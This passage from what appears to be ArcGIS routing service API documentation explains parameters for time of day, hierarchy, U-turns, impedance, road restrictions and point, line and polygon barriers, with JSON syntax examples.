true (use UTC): The timeOfDay value refers to Coordinated Universal Time (UTC). Illustration: setting timeOfDay to 9:00 a.m., 4 January 1990 (631443600000 milliseconds) and timeOfDayIsUTC to true, the start time for points in the Eastern Time Zone is 4:00 a.m. Eastern Time (9:00 a.m. UTC).

Note:
• This parameter is ignored when impedanceAttributeName is set to distance units.
• All incidents must be in the same time zone when specifying a start time and traveling from incident to facility, or when specifying an end time and traveling from facility to incident.
• All facilities must be in the same time zone when specifying a start time and traveling from facility to incident, or when specifying an end time and traveling from incident to facility.

timeOfDayUsage
Use this parameter to specify whether the timeOfDay parameter value represents the arrival or departure time for the routes. The parameter can be specified using the following values:

• esriNATimeOfDayUseAsStartTime: When this value is specified, the service finds the best route considering the timeOfDay parameter value as the departure time from the facility or incident.
• esriNATimeOfDayUseAsEndTime: When this value is specified, the service considers the timeOfDay parameter value as the arrival time at the facility or incident. This value is useful if you want to know what time to depart from a location so that you arrive at the destination at the time specified in timeOfDay.

The default value for this parameter is esriNATimeOfDayUseAsStartTime. The parameter value is ignored if the timeOfDay parameter is not specified.

useHierarchy
Specify whether hierarchy should be used when finding the shortest paths.

Caution: The value of this parameter, regardless of whether you rely on the default or explicitly set a value, is overridden when you pass in travelMode.

• true (default)—Use hierarchy when measuring between points. When hierarchy is used, the tool prefers higher-order streets (such as freeways) to lower-order streets (such as local roads), and can be used to simulate the driver preference of traveling on freeways instead of local roads even if that means a longer trip. This is especially true when finding routes to faraway locations, because drivers on long-distance trips tend to prefer traveling on freeways, where stops, intersections, and turns can be avoided. Using hierarchy is computationally faster, especially for long-distance routes, since the tool can determine the best route from a relatively smaller subset of streets.
• false—Do not use hierarchy when measuring between stops. If hierarchy is not used, the tool considers all the streets and doesn't prefer higher-order streets when finding the route. This is often used when finding short-distance routes within a city.

Caution: The service automatically reverts to using hierarchy if the straight-line distance between the stops is greater than 50 miles (80.46 kilometers), even if you have specified to find the route without using hierarchy.
restrictUTurns
Use this parameter to restrict or permit the route from making U-turns at junctions.

Caution: The value of this parameter, regardless of whether you rely on the default or explicitly set a value, is overridden when you pass in travelMode.

In order to understand the available parameter values, consider for a moment that a junction is a point where only two streets intersect each other. If three or more streets intersect at a point, it is called an intersection. A cul-de-sac is a dead end. The parameter can have the following values:

• esriNFSBAllowBacktrack (default): U-turns are permitted everywhere, at junctions with any number of adjacent streets. Allowing U-turns implies that the vehicle can turn around at a junction and double back on the same street.
• esriNFSBAtDeadEndsAndIntersections: U-turns are prohibited at junctions where exactly two adjacent streets meet; they are permitted only at intersections and dead ends.
• esriNFSBAtDeadEndsOnly: U-turns are prohibited at all junctions and intersections and are permitted only at dead ends.
• esriNFSBNoBacktrack: U-turns are prohibited at all junctions, intersections, and dead ends. Note that even when this parameter value is chosen, a route can still make U-turns at stops. If you wish to prohibit U-turns at a stop, you can set its CurbApproach property to the appropriate value (3).

impedanceAttributeName
Specify the impedance.

Caution: The value of this parameter, regardless of whether you rely on the default or explicitly set a value, is overridden when you pass in travelMode.

Impedance is a value that quantifies travel along the transportation network. Travel distance is an example of impedance; it quantifies the length of walkways and road segments. Similarly, drive time—the typical time it takes to drive a car along a road segment—is an example of impedance. Drive times may vary by type of vehicle—for instance, the time it takes for a truck to travel along a path tends to be longer than for a car—so there can be many impedance values representing travel times for different vehicle types. Impedance values may also vary with time; live and historical traffic reference dynamic impedance values. Each walkway and road segment stores at least one impedance value. When performing a network analysis, the impedance values are used to calculate the best results, such as finding the shortest route—the route that minimizes impedance—between two points.

The impedance parameter can be specified using the following values:

• TravelTime (default)—Models travel times for a car. These travel times can be dynamic, fluctuating according to traffic flows, in areas where traffic data is available.
• TruckTravelTime—Models travel times for a truck. These travel times are static for each road and don't fluctuate with traffic.
• WalkTime—Models travel times for a pedestrian. The default walking speed is 5 kilometers per hour (3.1 miles per hour), but you can change that speed through the attributeParameterValues parameter by setting Walking Speed (km/h) to a different value.
• Miles—Specifies that the travel distance between the stops should be minimized. The total distance between the stops is calculated in miles.
• Kilometers—Specifies that the travel distance between the stops should be minimized. The total distance between the stops is calculated in kilometers.

accumulateAttributeNames
Use this parameter to specify whether the service should accumulate values other than the value specified for impedanceAttributeName. For example, if your impedanceAttributeName is set to TravelTime, the total travel time for the route will be calculated by the service. However, if you also want to calculate the total distance of the route in miles, you can specify Miles as the value for the accumulateAttributeNames parameter. The parameter value should be specified as a comma-separated list of names; the valid names are the same as the values of the impedanceAttributeName parameter. For example, accumulateAttributeNames=Miles,Kilometers indicates that the total cost of the route should also be calculated in miles and kilometers. This is also the default value for this parameter.

Note: The values specified for the accumulateAttributeNames parameter are purely for reference. The service always uses impedanceAttributeName to find the best routes.
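A short illustrative combination of the two parameters in a Python request dictionary; the parameter names are as documented above, and the dictionary would be merged into a request like the one sketched earlier:

# Minimize travel time, but also report route length in miles and
# kilometers; the accumulated values are informational only.
params = {
    "impedanceAttributeName": "TravelTime",
    "accumulateAttributeNames": "Miles,Kilometers",
}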
restrictionAttributeNames
Use this parameter to specify which restrictions should be honored by the service. A restriction represents a driving preference or requirement. In most cases, restrictions cause roads or pathways to be prohibited, but they can also cause them to be avoided or preferred. For instance, using an Avoid Toll Roads restriction will result in a route that includes toll roads only when it is absolutely required to travel on toll roads in order to visit a stop. Height Restriction makes it possible to route around any clearances that are lower than the height of your vehicle. If you are carrying corrosive materials on your vehicle, using the Any Hazmat Prohibited restriction prevents hauling the materials along roads where it is marked as illegal to do so.

Caution: The value of this parameter, regardless of whether you rely on the default or explicitly set a value, is overridden when you pass in travelMode.

The parameter value is specified as a comma-separated list of restriction names. For example, the default value for this parameter is restrictionAttributeNames=Avoid Carpool Roads, Avoid Express Lanes, Avoid Gates, Avoid Private Roads, Avoid Unpaved Roads, Driving an Automobile, Roads Under Construction Prohibited, Through Traffic Prohibited. A value of none indicates that no restrictions should be used when finding shortest paths.

The service supports the restriction names listed below.

Note: Some restrictions are supported only in certain countries, as indicated by the availability noted for each restriction. A restriction is supported in a country if the Logistics Attribute column has a value of Yes in the list of supported countries. If you specify restriction names that are not available in the country where your input points are located, the service ignores the invalid restrictions and returns warning messages indicating the names of the restrictions that were not considered when making measurements.

Note: Sometimes you need to specify an additional value, the restriction attribute parameter, on a restriction to get the intended results. This value needs to be associated with the restriction name and a restriction parameter using attributeParameterValues.

• Any Hazmat Prohibited: The route will not include roads where transporting any kind of hazardous material is prohibited. Availability: Select countries in North America and Europe.
• Avoid Carpool Roads: The route will avoid roads that are designated exclusively for carpool (high-occupancy) vehicles. Availability: All countries.
• Avoid Express Lanes: The route will avoid roads designated as express lanes. Availability: All countries.
• Avoid Ferries: The route will avoid ferries. Availability: All countries.
• Avoid Gates: The route will avoid roads where there are gates, such as keyed access or guard-controlled entryways. Availability: All countries.
• Avoid Limited Access Roads: The route will avoid roads that are limited-access highways. Availability: All countries.
• Avoid Private Roads: The route will avoid roads that are not publicly owned and maintained. Availability: All countries.
• Avoid Toll Roads: The route will avoid toll roads. Availability: All countries.
• Avoid Truck Restricted Roads: The route will avoid roads where trucks are not allowed except when making deliveries. Availability: All countries.
• Avoid Unpaved Roads: The route will avoid roads that are not paved (for example, dirt, gravel, etc.). Availability: All countries.
• Axle Count Restriction: The route will not include roads where trucks with the specified number of axles are prohibited. The number of axles can be specified using the Number of Axles restriction parameter. Availability: Select countries in North America and Europe.
• Driving a Bus: The route will not include roads where buses are prohibited. Using this restriction will also ensure that the route will honor one-way streets. Availability: All countries.
• Driving a Delivery Vehicle: The route will not include roads where delivery vehicles are prohibited. Using this restriction will also ensure that the route will honor one-way streets. Availability: All countries.
• Driving a Taxi: The route will not include roads where taxis are prohibited. Using this restriction will also ensure that the route will honor one-way streets. Availability: All countries.
• Driving a Truck: The route will not include roads where trucks are prohibited. Using this restriction will also ensure that the route will honor one-way streets. Availability: All countries.
• Driving an Automobile: The route will not include roads where automobiles are prohibited. Using this restriction will also ensure that the route will honor one-way streets. Availability: All countries.
• Driving an Emergency Vehicle: The route will not include roads where emergency vehicles are prohibited. Using this restriction will also ensure that the route will honor one-way streets. Availability: All countries.
• Height Restriction: The route will not include roads where the vehicle height exceeds the maximum allowed height for the road. The vehicle height can be specified using the Vehicle Height (meters) restriction parameter. Availability: Select countries in North America and Europe.
• Kingpin to Rear Axle Length Restriction: The route will not include roads where the vehicle length exceeds the maximum allowed kingpin to rear axle length for all trucks on the road. The length between the vehicle kingpin and the rear axle can be specified using the Vehicle Kingpin to Rear Axle Length (meters) restriction parameter. Availability: Select countries in North America and Europe.
• Length Restriction: The route will not include roads where the vehicle length exceeds the maximum allowed length for the road. The vehicle length can be specified using the Vehicle Length (meters) restriction parameter. Availability: Select countries in North America and Europe.
• Preferred for Pedestrians: The route prefers paths designated for pedestrians. Availability: All countries.
• Riding a Motorcycle: The route will not include roads where motorcycles are prohibited. Using this restriction will also ensure that the route will honor one-way streets. Availability: All countries.
• Roads Under Construction Prohibited: The route will not include roads that are under construction. Availability: All countries.
• Semi or Tractor with One or More Trailers Prohibited: The route will not include roads where semis or tractors with one or more trailers are prohibited. Availability: Select countries in North America and Europe.
• Single Axle Vehicles Prohibited: The route will not include roads where vehicles with single axles are prohibited. Availability: Select countries in North America and Europe.
• Tandem Axle Vehicles Prohibited: The route will not include roads where vehicles with tandem axles are prohibited. Availability: Select countries in North America and Europe.
• Through Traffic Prohibited: The route will not include roads where through traffic (non-local) is prohibited. Availability: All countries.
• Truck with Trailers Restriction: The route will not include roads where trucks with the specified number of trailers are prohibited. The number of trailers on the truck can be specified using the Number of Trailers on Truck restriction parameter. Availability: Select countries in North America and Europe.
• Use Preferred Hazmat Routes: The route will prefer roads that are designated for transporting any kind of hazardous materials. Availability: Select countries in North America and Europe.
• Use Preferred Truck Routes: The route will prefer roads that are designated as truck routes, such as the roads that are part of the national network as specified by the National Surface Transportation Assistance Act in the United States, roads that are designated as truck routes by the state or province, or roads that are preferred by trucks when driving in an area. Availability: Select countries in North America and Europe.
• Walking: The route will not include roads where pedestrians are prohibited. Availability: All countries.
• Weight Restriction: The route will not include roads where the vehicle weight exceeds the maximum allowed weight for the road. The vehicle weight can be specified using the Vehicle Weight (kilograms) restriction parameter. Availability: Select countries in North America and Europe.
• Weight per Axle Restriction: The route will not include roads where the vehicle weight per axle exceeds the maximum allowed weight per axle for the road. The vehicle weight per axle can be specified using the Vehicle Weight per Axle (kilograms) restriction parameter. Availability: Select countries in North America and Europe.
• Width Restriction: The route will not include roads where the vehicle width exceeds the maximum allowed width for the road. The vehicle width can be specified using the Vehicle Width (meters) restriction parameter. Availability: Select countries in North America and Europe.

Legacy: The Driving a Delivery Vehicle restriction attribute is deprecated and will be unavailable in future releases. To achieve similar results, use the Driving a Truck restriction attribute along with the Avoid Truck Restricted Roads restriction attribute.

Example: restrictionAttributeNames=Driving an Emergency Vehicle,Height Restriction,Length Restriction
attributeParameterValues
Use this parameter to specify additional values required by an attribute or restriction, such as to specify whether the restriction prohibits, avoids, or prefers travel on restricted roads. If the restriction is meant to avoid or prefer roads, you can further specify the degree to which they are avoided or preferred using this parameter.

Caution: The value of this parameter, regardless of whether you rely on the default or explicitly set a value, is overridden when you pass in travelMode.

The parameter value is specified as an array of objects, each having the following properties:

• attributeName—The name of the restriction.
• parameterName—The name of the parameter associated with the restriction. A restriction can have one or more parameterName properties.
• value—The value for parameterName.

Most attribute parameters are related to the restriction attributes in restrictionAttributeNames. Each restriction has at least one attribute parameter named Restriction Usage, which specifies whether the restriction prohibits, avoids, or prefers travel on the roads associated with the restriction and the degree to which the roads are avoided or preferred. The Restriction Usage parameter can be assigned any of the following string values, or their equivalent numeric values listed within the parentheses:

• Prohibited (-1)—Travel on the roads that have the restriction is completely prohibited.
• Avoid_High (5)—It is very unlikely for the service to include in the route the roads that are associated with the restriction.
• Avoid_Medium (2)—It is unlikely for the service to include in the route the roads that are associated with the restriction.
• Avoid_Low (1.3)—It is somewhat unlikely for the service to include in the route the roads that are associated with the restriction.
• Prefer_Low (0.8)—It is somewhat likely for the service to include in the route the roads that are associated with the restriction.
• Prefer_Medium (0.5)—It is likely for the service to include in the route the roads that are associated with the restriction.
• Prefer_High (0.2)—It is very likely for the service to include in the route the roads that are associated with the restriction.

Note: The restrictionAttributeNames parameter is associated with attributeParameterValues. The restriction attribute's parameter value is specified as part of attributeParameterValues. Each restriction has at least one parameter named Restriction Usage, which specifies whether travel on roads that have the restriction is prohibited, should be avoided, or should be preferred. For the latter two options, it also specifies the degree to which the roads are avoided or preferred.

In most cases, you can use the default value, Prohibited, for Restriction Usage if the restriction is dependent on a physical vehicle characteristic, such as vehicle height. However, in some cases, the value for Restriction Usage depends on your routing preferences. For example, the Avoid Toll Roads restriction has the default value of Avoid_Medium for the Restriction Usage parameter. This means that when the restriction is used, the service will try to route around toll roads when it can. Avoid_Medium also indicates how important it is to avoid toll roads when finding the best route; it has a medium priority. Choosing Avoid_Low would put lower importance on avoiding tolls; choosing Avoid_High instead would give it a higher importance and thus make it more acceptable for the service to generate longer routes to avoid tolls. Choosing Prohibited would entirely disallow travel on toll roads, making it impossible for a route to travel on any portion of a toll road. Keep in mind that avoiding or prohibiting toll roads, and thus avoiding toll payments, is the objective for some; in contrast, others prefer to drive on toll roads because avoiding traffic is more valuable to them than the money spent on tolls. In the latter case, you would choose Prefer_Low, Prefer_Medium, or Prefer_High as the value for Restriction Usage. The higher the preference, the farther the service will go out of its way to travel on the roads associated with the restriction.

The following list gives the attribute parameter names and the default parameter values.

Tip: If you wish to use the default value for a restriction parameter, the restriction name, restriction parameter name, and restriction parameter value do not have to be specified as part of the attributeParameterValues.
• Any Hazmat Prohibited: Restriction Usage = Prohibited
• Avoid Carpool Roads: Restriction Usage = Avoid_High
• Avoid Express Lanes: Restriction Usage = Avoid_High
• Avoid Ferries: Restriction Usage = Avoid_Medium
• Avoid Gates: Restriction Usage = Avoid_Medium
• Avoid Limited Access Roads: Restriction Usage = Avoid_Medium
• Avoid Private Roads: Restriction Usage = Avoid_Medium
• Avoid Toll Roads: Restriction Usage = Avoid_Medium
• Avoid Truck Restricted Roads: Restriction Usage = Avoid_High
• Axle Count Restriction: Restriction Usage = Prohibited; Number of Axles = 0
• Driving a Bus: Restriction Usage = Prohibited
• Driving a Delivery Vehicle: Restriction Usage = Prohibited
• Driving a Taxi: Restriction Usage = Prohibited
• Driving a Truck: Restriction Usage = Prohibited
• Driving an Automobile: Restriction Usage = Prohibited
• Driving an Emergency Vehicle: Restriction Usage = Prohibited
• Height Restriction: Restriction Usage = Prohibited; Vehicle Height (meters) = 0
• Kingpin to Rear Axle Length Restriction: Restriction Usage = Prohibited; Vehicle Kingpin to Rear Axle Length (meters) = 0
• Length Restriction: Restriction Usage = Prohibited; Vehicle Length (meters) = 0
• Riding a Motorcycle: Restriction Usage = Prohibited
• Roads Under Construction Prohibited: Restriction Usage = Prohibited
• Semi or Tractor with One or More Trailers Prohibited: Restriction Usage = Prohibited
• Single Axle Vehicles Prohibited: Restriction Usage = Prohibited
• Tandem Axle Vehicles Prohibited: Restriction Usage = Prohibited
• Through Traffic Prohibited: Restriction Usage = Avoid_High
• Truck with Trailers Restriction: Restriction Usage = Prohibited; Number of Trailers on Truck = 0
• Use Preferred Hazmat Routes: Restriction Usage = Prefer_Medium
• Use Preferred Truck Routes: Restriction Usage = Prefer_Medium
• Walking: Restriction Usage = Prohibited
• WalkTime: Walking Speed (km/h) = 5
• Weight Restriction: Restriction Usage = Prohibited; Vehicle Weight (kilograms) = 0
• Weight per Axle Restriction: Restriction Usage = Prohibited; Vehicle Weight per Axle (kilograms) = 0
• Width Restriction: Restriction Usage = Prohibited; Vehicle Width (meters) = 0

Syntax for specifying attributeParameterValues:

[
  {
    "attributeName": "<attribute1>",
    "parameterName": "<parameter1>",
    "value": "<value1>"
  },
  {
    "attributeName": "<attribute2>",
    "parameterName": "<parameter2>",
    "value": "<value2>"
  }
]

Example: Specifying the vehicle height and weight and a high preference to use designated truck routes. This example shows how to specify the height and weight of the vehicle for use with the height and weight restrictions, respectively, along with a high preference to include the designated truck routes. This results in a route that does not include any roads where the clearance under overpasses or through tunnels is less than the vehicle height. The route will also not include any roads with load-limited bridges or local roads that prohibit heavy vehicles if the vehicle weight exceeds the maximum permissible weight. However, the route will include as many roads as possible that are designated as preferred truck routes. Note that the Restriction Usage parameter for the Height Restriction and the Weight Restriction is not specified, because we want to use the default value, Prohibited, for these restriction parameters.
attributeParameterValues=
[
  {
    "attributeName": "Height Restriction",
    "parameterName": "Vehicle Height (meters)",
    "value": 4.12
  },
  {
    "attributeName": "Weight Restriction",
    "parameterName": "Vehicle Weight (kilograms)",
    "value": 36287
  },
  {
    "attributeName": "Use Preferred Truck Routes",
    "parameterName": "Restriction Usage",
    "value": "Prefer_High"
  }
]

barriers
Use this parameter to specify one or more points that act as temporary restrictions or represent additional time or distance that may be required to travel on the underlying streets. For example, a point barrier can be used to represent a fallen tree along a street or a time delay spent at a railroad crossing.

Caution: The service imposes a maximum limit of 250 point barriers. If the value is exceeded, the response returns an error message.

The barriers parameter can be specified using a simple comma- and semicolon-based syntax if you need to specify only point barrier geometries as longitude and latitude values in the default spatial reference (WGS84).

Simple syntax for barriers:
barriers=x1,y1; x2,y2; ...; xn,yn

Example using simple syntax:
barriers=-117.1957,34.0564; -117.184,34.0546
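If the barrier points are already in code, the simple syntax is easy to assemble. A tiny sketch in Python, using the sample coordinates from the example above:

# Build the simple comma/semicolon barriers syntax from longitude/latitude pairs.
points = [(-117.1957, 34.0564), (-117.184, 34.0546)]
barriers = ";".join(f"{x},{y}" for x, y in points)
# barriers == "-117.1957,34.0564;-117.184,34.0546"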
You can specify barrier geometries as well as attributes using a more comprehensive JSON structure that represents a set of features. The JSON structure can include the following properties:

• features: Specify an array of features. This property is optional; however, either the features or the url property must be specified.
• url: Specify a REST query request to any ArcGIS Server feature, map, or geoprocessing service that returns a JSON feature set. This property is optional; however, either the features or the url property must be specified.

Each feature in this array represents a point barrier and contains the following fields:

• geometry: Specifies the barrier geometry as a point containing x and y properties along with a spatialReference property. The spatialReference property is not required if the coordinate values are in the default spatial reference, WGS84. If the coordinate values are in a different spatial reference, you need to specify the well-known ID (WKID) for the spatial reference. You can find the WKID for your spatial reference depending on whether the coordinates are represented in a geographic coordinate system or a projected coordinate system.
• attributes: Specify each attribute as a key-value pair, where the key is the name of a given field and the value is the attribute value for the corresponding field.

Attributes for barriers

When specifying the barriers parameter using the JSON structure, you can specify additional information about barriers, such as the barrier type, using attributes. The barriers parameter can be specified with the following attributes:

• Name: The name of the barrier.
• BarrierType: Specifies whether the point barrier restricts travel completely or adds time or distance when it is crossed. The value for this attribute is specified as one of the following integers:
  • 0 - Prohibits traversing through the barrier. The barrier is referred to as a restriction point barrier since it acts as a restriction. This is the default value. (Two maps demonstrate how a restriction point barrier affects a route analysis: the map on the left shows the shortest path between two stops without any restriction point barriers; the map on the right has a road that is blocked by a fallen tree, so the shortest path between the same points is longer.)
  • 2 - Traveling through the barrier increases the travel time or distance by the amount specified as the value for the Attr_TravelTime, Attr_Miles, or Attr_Kilometers attributes. This barrier type is referred to as an added cost point barrier. The cost of crossing the barrier is added to the accumulated travel time of the resulting route. (Two maps demonstrate how added cost barriers affect a route analysis: the map on the left shows the shortest path between two stops without any added cost point barrier; for the map on the right, the travel time from stop one to stop two would be the same whether going around the north end of the block or the south end; however, since crossing railroad tracks incurs a time penalty, modeled with added cost point barriers, the route with only one railroad crossing is chosen.)

Note: There is no point barrier type with a value of 1 for the BarrierType attribute.

• FullEdge: This attribute is applicable only for restriction point barriers. The value for this attribute is specified as one of the following integers:
  • 0 - Permits travel on the edge up to the barrier, but not through it. This is the default value.
  • 1 - Restricts travel anywhere on the underlying street.
• Attr_TravelTime: Indicates how much travel time, in minutes, is added when the barrier is traversed. This attribute is applicable only for added-cost barriers. The attribute value must be greater than or equal to zero.
• Attr_Miles: Indicates how much distance, in miles, is added when the barrier is traversed. This attribute is applicable only for added-cost barriers. The attribute value must be greater than or equal to zero.
• Attr_Kilometers: Indicates how much distance, in kilometers, is added when the barrier is traversed. This attribute is applicable only for added-cost barriers. The attribute value must be greater than or equal to zero.

Syntax for specifying barriers using a JSON structure for features:

{
  "features": [
    {
      "geometry": {
        "x": <x>,
        "y": <y>,
        "spatialReference": {"wkid": <wkid>, "latestWkid": <wkid>}
      },
      "attributes": {"<field1>": <value11>, "<field2>": <value12>}
    },
    {
      "geometry": {
        "x": <x>,
        "y": <y>,
        "spatialReference": {"wkid": <wkid>, "latestWkid": <wkid>}
      },
      "attributes": {"<field1>": <value21>, "<field2>": <value22>}
    }
  ]
}

Example 1: Specifying an added cost point barrier using a JSON structure. This example shows how to use an added cost point barrier to model a 5-minute delay at a railroad crossing. The BarrierType attribute is used to specify that the point barrier is of type added cost, and the Attr_TravelTime attribute is used to specify the delay in minutes. The barrier geometry is in the default spatial reference, WGS84, and hence the spatialReference property is not required within the geometry property.

{
  "features": [
    {
      "geometry": {"x": -122.053461, "y": 37.541479},
      "attributes": {"Name": "Haley St railroad crossing", "BarrierType": 2, "Attr_TravelTime": 5}
    }
  ]
}

Syntax for specifying barriers using a URL to a JSON response:

{ "url": "<url>" }

Example 2: Specifying a restriction point barrier using a URL. The URL makes a query for a few features from a map service. A URL querying features from a feature service can also be specified.

{ "url": "http://sampleserver3.arcgisonline.com/ArcGIS/rest/services/Network/USA/MapServer/0/query?where=1%3D1&returnGeometry=true&f=json" }
polylineBarriers
Use this parameter to specify one or more lines that prohibit travel anywhere the lines intersect the streets. For example, a parade or protest that blocks traffic across several street segments can be modeled with a line barrier. A line barrier can also quickly fence off several roads from being traversed, thereby channeling possible routes away from undesirable parts of the street network. (Two maps demonstrate how a line barrier affects finding a route between two stops: the map on the left displays the shortest path between two stops; the map on the right shows the shortest path when several streets are blocked by a polyline barrier.)

Caution: The service imposes a limit on the number of streets you can restrict using the polylineBarriers parameter. While there is no limit on the number of lines you can specify as polyline barriers, the combined number of streets intersected by all the lines should not exceed 500. If the value is exceeded, the response returns an error message.

You can specify polyline barrier geometries as well as attributes using a JSON structure that represents a set of features. The JSON structure can include the following properties:

• features: Specify an array of features. This property is optional; however, either the features or the url property must be specified.
• url: Specify a REST query request to any ArcGIS Server feature, map, or geoprocessing service that returns a JSON feature set. This property is optional; however, either the features or the url property must be specified.

Each feature in this array represents a polyline barrier and contains the following fields:

• geometry: Specifies the barrier geometry. The structure is based on the ArcGIS REST polyline object. A polyline contains an array of paths and a spatialReference. Each path is represented as an array of points, and each point in the path is represented as an array of numbers containing X and Y coordinate values at index 0 and 1, respectively. The spatialReference property is not required if the coordinate values are in the default spatial reference, WGS84. If the coordinate values are in a different spatial reference, you need to specify the well-known ID (WKID) for the spatial reference. You can find the WKID for your spatial reference depending on whether the coordinates are represented in a geographic coordinate system or a projected coordinate system.
• attributes: Specify each attribute as a key-value pair, where the key is the name of a given field and the value is the attribute value for the corresponding field.

Attributes for polylineBarriers

When specifying the polylineBarriers parameter using the JSON structure, the parameter can be specified with the following attribute:

• Name: The name of the polyline barrier.

Syntax for specifying polyline barriers using a JSON structure for features:

{
  "features": [
    {
      "geometry": {
        "paths": [
          [[<x11>, <y11>], [<x12>, <y12>]],
          [[<x21>, <y21>], [<x22>, <y22>]]
        ],
        "spatialReference": {"wkid": <wkid>, "latestWkid": <wkid>}
      },
      "attributes": {"<field1>": <value11>, "<field2>": <value12>}
    },
    {
      "geometry": {
        "paths": [
          [[<x11>, <y11>], [<x12>, <y12>]],
          [[<x21>, <y21>], [<x22>, <y22>]]
        ],
        "spatialReference": {"wkid": <wkid>, "latestWkid": <wkid>}
      },
      "attributes": {"<field1>": <value21>, "<field2>": <value22>}
    }
  ]
}

Example 1: Specifying polyline barriers using a JSON structure. The example shows how to add two lines as polyline barriers to restrict travel on the streets intersected by the lines. Barrier 1 is a single-part line feature made up of two points. Barrier 2 is a two-part line feature; the first part is made up of three points, and the second part is made up of two points. The barrier geometries are in the Web Mercator spatial reference and not in the default WGS84 spatial reference. Hence, the spatialReference property is required within the geometry property.

{
  "features": [
    {
      "geometry": {
        "paths": [[[-10804823.397, 3873688.372], [-10804811.152, 3873025.945]]],
        "spatialReference": {"wkid": 102100}
      },
      "attributes": {"Name": "Barrier 1"}
    },
    {
      "geometry": {
        "paths": [
          [[-10804823.397, 3873688.372], [-10804807.813, 3873290.911], [-10804811.152, 3873025.945]],
          [[-10805032.678, 3863358.76], [-10805001.508, 3862829.281]]
        ],
        "spatialReference": {"wkid": 102100}
      },
      "attributes": {"Name": "Barrier 2"}
    }
  ]
}

Syntax for specifying polyline barriers using a URL returning a JSON response:

{ "url": "<url>" }

Example 2: Specifying a polyline barrier using a URL. The URL makes a query for a few features from a map service. A URL querying features from a feature service can also be specified.

{ "url": "http://sampleserver3.arcgisonline.com/ArcGIS/rest/services/Network/USA/MapServer/6/query?where=1%3D1&returnGeometry=true&f=json" }
polygonBarriers
Use this parameter to specify polygons that either completely restrict travel or proportionately scale the time or distance required to travel on the streets intersected by the polygons.

Caution: The service imposes a limit on the number of streets you can restrict using the polygonBarriers parameter. While there is no limit on the number of polygons you can specify as polygon barriers, the combined number of streets intersected by all the polygons should not exceed 2,000. If the value is exceeded, the response returns an error message.

You can specify polygon barrier geometries as well as attributes using a JSON structure that represents a set of features. The JSON structure can include the following properties:

• features: Specify an array of features. This property is optional; however, either the features or the url property must be specified.
• url: Specify a REST query request to any ArcGIS Server feature, map, or geoprocessing service that returns a JSON feature set. This property is optional; however, either the features or the url property must be specified.

Each feature in this array represents a polygon barrier and contains the following fields:

• geometry: Specifies the barrier geometry. The structure is based on the ArcGIS REST polygon object. A polygon contains an array of rings and a spatialReference. The first point of each ring is always the same as the last point. Each point in the ring is represented as an array of numbers containing X and Y coordinate values at index 0 and 1, respectively. The spatialReference property is not required if the coordinate values are in the default spatial reference, WGS84. If the coordinate values are in a different spatial reference, you need to specify the well-known ID (WKID) for the spatial reference. You can find the WKID for your spatial reference depending on whether the coordinates are represented in a geographic coordinate system or a projected coordinate system.
• attributes: Specify each attribute as a key-value pair, where the key is the name of a given field and the value is the attribute value for the corresponding field.

Attributes for polygonBarriers

When specifying the polygonBarriers parameter using the JSON structure, you can specify additional information about barriers, such as the barrier type, using attributes.
The polygonBarriers parameter can be specified with the following attributes:

• Name: The name of the barrier.
• BarrierType: Specifies whether the barrier restricts travel completely or scales the time or distance for traveling through it. The value for this attribute is specified as one of the following integers:
  • 0 - Prohibits traveling through any part of the barrier. The barrier is referred to as a restriction polygon barrier since it prohibits traveling on streets intersected by the barrier. One use of this type of barrier is to model floods covering areas of the street that make traveling on those streets impossible. This is the default value. (Two maps demonstrate how a restriction polygon barrier affects finding a route between two stops: the left side depicts the shortest path between two stops; on the right, a polygon barrier blocks flooded streets, so the shortest path between the same two stops is different.)
  • 1 - Scales the time or distance required to travel the underlying streets by a factor specified using the Attr_TravelTime, Attr_Miles, or Attr_Kilometers attributes. If the streets are partially covered by the barrier, the travel time or distance is apportioned and then scaled. For example, a factor of 0.25 means that travel on the underlying streets is expected to be four times faster than normal, while a factor of 3.0 means it is expected to take three times longer than normal. This barrier type is referred to as a scaled cost polygon barrier. It might be used to model storms that reduce travel speeds in specific regions. The service uses the modified travel time in calculating the best route; furthermore, the modified travel time is reported as the total travel time in the response. (Two maps demonstrate how a scaled cost polygon barrier affects finding a route between two stops: the map on the left shows a route that goes through inclement weather without regard for the effect poor road conditions have on travel time; on the right, a scaled polygon barrier doubles the travel time of the roads covered by the storm. Notice the route still passes through the southern tip of the storm, since it is quicker to spend more time driving slowly through a small part of the storm than to drive completely around it.)
• Attr_TravelTime: The factor by which the travel time of the streets intersected by the barrier is multiplied. This attribute is applicable only for scaled-cost barriers. You should specify this attribute if the impedanceAttributeName request parameter has the value TravelTime. The attribute value must be greater than zero.
• Attr_Miles: The factor by which the distance of the streets intersected by the barrier is multiplied. This attribute is applicable only for scaled-cost barriers. You should specify a value for this attribute if the impedanceAttributeName request parameter has the value Miles. The attribute value must be greater than zero.
• Attr_Kilometers: The factor by which the distance of the streets intersected by the barrier is multiplied. This attribute is applicable only for scaled-cost barriers. You should specify a value for this attribute if the impedanceAttributeName request parameter has the value Kilometers. The attribute value must be greater than zero.
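To make the scaling arithmetic concrete, here is a small illustrative sketch in Python; this is not the service's internal code, and the numbers are hypothetical:

# A scaled cost polygon barrier multiplies the cost of the covered street
# portion. With Attr_TravelTime = 3.0, a stretch that normally takes 6
# minutes is reported as 18 minutes; with 0.25 it would take 1.5 minutes.
base_minutes = 6.0
factor = 3.0                  # Attr_TravelTime of the scaled-cost barrier
print(base_minutes * factor)  # 18.0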
Syntax for specifying polygon barriers using a JSON structure for features

{ "features": [ { "geometry": { "rings": [ [ [ <x11>, <y11> ], [ <x12>, <y12> ], ..., [ <x11>, <y11> ] ], [ [ <x21>, <y21> ], [ <x22>, <y22> ], ..., [ <x21>, <y21> ] ] ], "spatialReference": { "wkid": <wkid>, "latestWkid": <wkid> } }, "attributes": { "<field1>": <value11>, "<field2>": <value12> } }, { "geometry": { "rings": [ [ [ <x11>, <y11> ], [ <x12>, <y12> ], ..., [ <x11>, <y11> ] ], [ [ <x21>, <y21> ], [ <x22>, <y22> ], ..., [ <x21>, <y21> ] ] ], "spatialReference": { "wkid": <wkid>, "latestWkid": <wkid> } }, "attributes": { "<field1>": <value21>, "<field2>": <value22> } } ] }

